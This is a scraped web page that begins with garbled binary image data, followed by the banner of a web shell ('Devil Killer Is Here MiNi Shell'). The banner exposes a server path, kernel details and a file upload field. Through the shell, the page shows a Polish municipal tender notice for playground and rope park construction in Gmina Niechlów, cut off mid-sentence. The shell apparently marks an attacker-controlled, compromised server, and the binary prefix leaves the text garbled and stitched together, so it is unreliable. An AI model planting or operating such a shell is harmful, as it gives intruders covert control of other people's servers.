JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220822/0031445801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „2022 RFIL BUDOWA I MODERNIZACJA PLACÓW ZABAW NA TERENIE GMINY NIECHLÓW WRAZ Z WYKONANIEM BEZPIECZNEJ NAWIERZCHNI I OGRODZENIEM TERENU” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA NIECHLÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050630</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Głogowska 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Niechlów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-215</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@niechlow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.niechlow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „2022 RFIL BUDOWA I MODERNIZACJA PLACÓW ZABAW NA TERENIE GMINY NIECHLÓW WRAZ Z WYKONANIEM BEZPIECZNEJ NAWIERZCHNI I OGRODZENIEM TERENU” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-913ea1ec-1fa1-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00314458</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00041166/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 „2022 RFIL BUDOWA I MODERNIZACJA PLACÓW ZABAW NA TERENIE GMINY NIECHLÓW WRAZ Z WYKONANIEM BEZPIECZNEJ NAWIERZCHNI I OGRODZENIEM TERENU”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://niechlow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej za pośrednictwem Platformy zakupowej https://niechlow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej: <br/>Zamawiający, zgodnie z § 3 ust. 3 ww. Rozporządzenia określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: <br/>a)	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; <br/>b)	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c)	Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0; <br/>d)	Włączona obsługa JavaScript;<br/>e)	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. <br/><br/>Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc. <br/>Korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://niechlow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna o przetwarzaniu danych została zawarta w rozdziale I pkt 23</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna o przetwarzaniu danych została zawarta w rozdziale I pkt 23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRIOŚ.271.23.2022.AM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 734291,71 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Określenie przedmiotu oraz zakresu zamówienia:<br/><br/>CZĘŚĆ I – BUDOWA PARKU LINOWEGO <br/><br/>Część I przedmiotu zamówienia obejmuje budowę parku linowego złożonego z dwóch tras tj.: <br/>● o niskim stopniu trudności: 12 przeszkód, <br/>● o wyższym stopniu trudności: 16 przeszkód<br/>wg. planu zagospodarowania terenu. <br/><br/>1.	Zakres robót budowlanych w ramach zamówienia obejmuje:<br/>1)	roboty przygotowawcze;<br/>2)	Wykonanie i montaż elementów parku linowego na słupach drewnianych wraz z systemem odciągów;<br/>3)	Wysokość umieszczenia toru w zakresie 0,4 do 0,6 m nad ziemią;<br/>4)	Elementy atrakcji, oraz podesty wykonane z drewna szlachetnego;<br/>5)	Prace porządkowe i wykończeniowe.<br/>(zgodnie z załącznikiem nr 9)<br/>2.	Wykonawca wykona dokumentację powykonawczej z mapką.<br/>3.	Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 9 do SWZ (Dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót budowlanych, kosztorys ofertowy).<br/>4.	Wbudowane materiały z wyjątkiem elementów drewnianych przeznaczone do zamontowania w parku muszą być fabrycznie nowe, posiadać atesty i certyfikaty wydane przez jednostki certyfikujące, posiadające akredytacje Polskiego Centrum Akredytacji, a w przypadkach niewymagalnych, Wykonawca jest zobowiązany do wystawienia deklaracji zgodności z Polskimi Normami.<br/>5.	Wydanie powykonawczej deklaracji Wykonawcy o zgodności z normami wymienionymi w punkcie 5 - dla każdego z zamontowanych urządzeń. <br/>6.	Wykonawca oświadczy – załącznik nr 1 do SWZ (Formularz ofertowy), że na etapie postępowania szczegółowo zapoznał się z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, zapisami SWZ i załącznikami (w tym ze wzorem umowy) i nie wnosi żadnych uwag.<br/>7.	Zamawiający dopuszcza możliwość przedstawienia w ofertach urządzeń i materiałów o parametrach równoważnych lub lepszych, nie gorszych niż proponowane w SWZ. Materiały i urządzenia zawarte w dokumentacji projektowej (załącznik nr 9 do SWZ) są przykładowe i określają minimalne wymagania Zamawiającego, co do funkcji, jakości materiału, kolorystyki, długości gwarancji, które winny spełniać poszczególne pozycje asortymentowe składające się na przedmiot zamówienia. Wykonawca, który powołuje się na rozwiązania równoważne opisane w ofercie obowiązany jest wykazać, że oferowany przez niego przedmiot zamówienia spełnia wymagania określone przez Zamawiającego. Wykonawca powołujący się na rozwiązania równoważne winien załączyć opinię projektanta w powyższym zakresie oraz zestawienie tabelaryczne, porównujące cechy, właściwości i funkcje materiału/urządzenia zawartego w dokumentacji projektowej.<br/>8.	W dokumentacji projektowej przyjęto konkretne wyroby, które należy traktować jako przykładowe, co oznacza, że Wykonawca może zaoferować własne urządzenia, zgodne ze swoją ofertą handlową, z zastrzeżeniem, że urządzenia te muszą być równoważne technicznie, o standardzie, co najmniej takim samym lub wyższym od opisanych dokumentacji oraz muszą być spełnić wymagania norm i przepisów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 448389,04 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212140-9 - Obiekty rekreacyjne</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <p class="mb-0">45212130-6 - Roboty budowlane w zakresie parków rozrywki</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">45112723-9 - Roboty w zakresie kształtowania placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Cena – należy przez to rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług nawet jeżeli jest płacona na rzecz osoby niebędącej przedsiębiorcą.<br/>2.	Cenę oferty należy obliczyć jako ryczałtowe wynagrodzenie złotych brutto Wykonawcy (brutto, tj.: z podatkiem VAT i innymi należnościami publicznoprawnymi zgodnie z obowiązującymi przepisami) uwzględniając zakres zamówienia określony w dokumentacji zamówienia a także wszystkie przewidywane koszty kompletnego wykonania przedmiotu zamówienia, wymaganiami SWZ oraz wszelkie koszty, jakie poniesie Wykonawca z tytułu należytej oraz zgodnej z obowiązującymi przepisami realizacji przedmiotu zamówienia. <br/>3.	Przy kalkulacji ceny ofertowej należy wziąć pod uwagę obowiązki Wykonawcy wynikające ze wzoru umowy (załącznik nr 5, oraz załącznik nr 5A do SWZ).<br/>4.	Cenę brutto należy obliczyć poprzez dodanie do ceny netto podatku VAT według obowiązującej stawki podatku od towarów i usług (VAT) właściwą dla przedmiotu zamówienia, obowiązującą według stanu prawnego na dzień składania ofert.<br/>5.	Wykonawca wskaże cenę oferty, według wzoru wskazanego w Formularzu ofertowym - sporządzonym zgodnie z załącznikiem nr 1 do SWZ.<br/>6.	Cenę należy skalkulować w oparciu o dokumentację projektową, SWZ oraz specyfikacje techniczne wykonania i odbioru robót budowlanych.<br/>7.	Przed sporządzeniem oferty Zamawiający zaleca przeprowadzenie wizji lokalnej w terenie, celem zapoznania się ze stanem faktycznym obiektów i terenów przyległych do terenu objętego zamówieniem. <br/>8.	Załączone do niniejszej SWZ przedmiary robót pełnią funkcję pomocniczą i służą do przedstawienia przez Wykonawcę sposobu obliczenia ceny. <br/>9.	Cena oferty powinna być wyrażona w złotych polskich (PLN) z dokładnością do dwóch miejsc po przecinku. <br/>10.	Wszystkich działań/obliczeń należy dokonywać na liczbach zaokrąglonych do dwóch [ 2 ] miejsc po przecinku.<br/>11.	Zamawiający nie przewiduje rozliczeń w walucie obcej. <br/>12.	Wyliczona cena oferty brutto będzie służyć do porównania złożonych ofert i do rozliczenia w trakcie realizacji zamówienia. <br/>13.	Jeżeli została złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (t.j. Dz. U. z 2022 r. poz. 931, ze zm.), dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć . W ofercie, o której mowa w ust. 1, Wykonawca ma obowiązek: <br/>1)	poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego; <br/>2)	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego; <br/>3)	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku; <br/>4)	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie. <br/>14.	Podmioty zagraniczne na podstawie odrębnych przepisów dotyczących obrotu wewnątrzwspólnotowego nie są zobowiązane do uiszczenia podatku VAT w kraju odbiorcy (w kraju Zamawiającego), a sporządzane przez nich oferty muszą zawierać zerową stawkę VAT. Zamawiający dla potrzeb oceny i porównania ofert w przypadku oferty Wykonawcy mającego siedzibę poza granicami Polski doliczy do przedstawionych cen podatek od towarów i usług VAT, który ma obowiązek zapłacić zgodnie z obowiązującymi przepisami.<br/>15.	W przypadku rozbieżności pomiędzy ceną oferty podaną cyfrowo a słownie, jako wartość właściwa zostanie przyjęta cena podana cyfrowo.<br/>16.	Wykonawca zobowiązany jest do przestrzegania obowiązków wynikających z art. 225 ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II – BUDOWA I MODERNIZACJA PLACÓW ZABAW<br/>(o konstrukcji metalowej i z tworzyw sztucznych)<br/><br/>1.	Zakres robót budowlanych w ramach zamówienia obejmuje:<br/>1)	Budowę nowego placu zabaw w miejscowości Lipowiec (zgodnie z załącznikiem nr 9A) <br/>2)	Rozbudowę placów zabaw w miejscowości Niechlów (zgodnie z załącznikiem nr 9A)<br/>3)	Montaż elementów zabawowych (wymiana istniejących urządzeń na nowe, demontaż starych urządzeń po stronie Zamawiającego) na placach zabaw w miejscowościach: Wągroda, Głobice, Wroniniec, Żabin, Masełkowice, Miechów (zgodnie z załącznikiem nr 9A)<br/><br/>2.	Wykonawca wykona dokumentację powykonawczej z mapką.<br/>3.	Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 9 do SWZ (Dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót budowlanych, kosztorys ofertowy).<br/>4.	Wykonanie dostawy i montażu nowych urządzeń zabawowych wraz z certyfikatami wydanymi przez jednostki certyfikujące posiadające akredytację PCA zgodnie z obowiązującymi normami serii PN-EN 1176. <br/>5.	Wydanie powykonawczej deklaracji Wykonawcy o zgodności z normami wymienionymi w punkcie 5 - dla każdego z zamontowanych urządzeń. <br/>6.	Wykonawca oświadczy – załącznik nr 1 do SWZ (Formularz ofertowy) do SWZ, że na etapie postępowania szczegółowo zapoznał się z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, zapisami SWZ i załącznikami (w tym ze wzorem umowy) i nie wnosi żadnych uwag. <br/>7.	Zamawiający dopuszcza możliwość przedstawienia w ofertach urządzeń i materiałów o parametrach równoważnych lub lepszych, nie gorszych niż proponowane w SWZ. Materiały i urządzenia zawarte w dokumentacji projektowej i przedmiarze robót (załącznik nr 9A do SWZ) są przykładowe i określają minimalne wymagania Zamawiającego, co do funkcji, jakości materiału, kolorystyki, długości gwarancji, które winny spełniać poszczególne pozycje asortymentowe składające się na przedmiot zamówienia. Wykonawca, który powołuje się na rozwiązania równoważne opisane w ofercie obowiązany jest wykazać, że oferowany przez niego przedmiot zamówienia spełnia wymagania określone przez Zamawiającego. Wykonawca powołujący się na rozwiązania równoważne winien załączyć opinię projektanta w powyższym zakresie oraz zestawienie tabelaryczne, porównujące cechy, właściwości i funkcje materiału/urządzenia zawartego w dokumentacji projektowej.<br/>8.	Posadowienie nowych urządzeń zabawowych o konstrukcji metalowej w gruncie - w betonie - zgodnie ze sztuką budowlaną i wytycznymi Producenta. <br/>9.	W dokumentacji projektowej przyjęto konkretne wyroby, które należy traktować jako przykładowe, co oznacza, że Wykonawca może zaoferować własne urządzenia, zgodne ze swoją ofertą handlową, z zastrzeżeniem, że urządzenia te muszą być równoważne technicznie, o standardzie, co najmniej takim samym lub wyższym od opisanych dokumentacji oraz muszą być spełnić wymagania norm i przepisów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 285902,67 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212140-9 - Obiekty rekreacyjne</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <p class="mb-0">45212130-6 - Roboty budowlane w zakresie parków rozrywki</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">45112723-9 - Roboty w zakresie kształtowania placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Cena – należy przez to rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług nawet jeżeli jest płacona na rzecz osoby niebędącej przedsiębiorcą.<br/>2.	Cenę oferty należy obliczyć jako ryczałtowe wynagrodzenie złotych brutto Wykonawcy (brutto, tj.: z podatkiem VAT i innymi należnościami publicznoprawnymi zgodnie z obowiązującymi przepisami) uwzględniając zakres zamówienia określony w dokumentacji zamówienia a także wszystkie przewidywane koszty kompletnego wykonania przedmiotu zamówienia, wymaganiami SWZ oraz wszelkie koszty, jakie poniesie Wykonawca z tytułu należytej oraz zgodnej z obowiązującymi przepisami realizacji przedmiotu zamówienia. <br/>3.	Przy kalkulacji ceny ofertowej należy wziąć pod 